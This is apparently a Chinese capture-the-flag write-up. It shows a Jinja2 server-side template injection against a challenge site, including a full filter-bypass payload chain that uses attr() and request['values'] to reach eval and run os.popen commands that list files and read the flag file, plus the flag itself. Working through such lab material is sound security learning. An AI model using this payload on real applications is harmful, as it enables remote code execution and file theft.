web11-考核

打开网页提示Hello guest!

访问http://xmctf.top:8906/?name={{7*7}}，返回Hello 49!

访问http://xmctf.top:8906/?name={{config}}，页面被过滤，尝试发现被过滤的还有args,点，下划线

点可由attr绕过

下划线和args可由request['values']绕过

访问http://xmctf.top:8906/?name={{()|attr(request[%27values%27][%27class%27])|attr(request[%27values%27][%27base%27])|attr(request[%27values%27][%27subclasses%27])()|attr(request[%27values%27][%27getitem%27])(233)|attr(request[%27values%27][%27init%27])|attr(request[%27values%27][%27globals%27])|attr(request[%27values%27][%27getitem%27])(request[%27values%27][%27builtins%27])|attr(request[%27values%27][%27getitem%27])(request[%27values%27][%27eval%27])(request[%27values%27][%27cmd%27])}}，同时post如下参数：class=__class__&base=__base__&subclasses=__subclasses__&init=__init__&globals=__globals__&getitem=__getitem__&builtins=__builtins__&eval=eval&cmd=__import__("os").popen("ls").read()，执行成功

将post修改为class=__class__&base=__base__&subclasses=__subclasses__&init=__init__&globals=__globals__&getitem=__getitem__&builtins=__builtins__&eval=eval&cmd=__import__("os").popen("cat /fl4g").read()，被过滤

则修改为class=__class__&base=__base__&subclasses=__subclasses__&init=__init__&globals=__globals__&getitem=__getitem__&builtins=__builtins__&eval=eval&cmd=__import__("os").popen("cat /fl4g|base64").read()，得到flag的base64编码：ZmxhZ3sxMnNkLWp0NGVzZjMtczkzaGNlY2MzLXMzM2ZmM30K

解码获得flag：

flag{12sd-jt4esf3-s93hcecc3-s33ff3}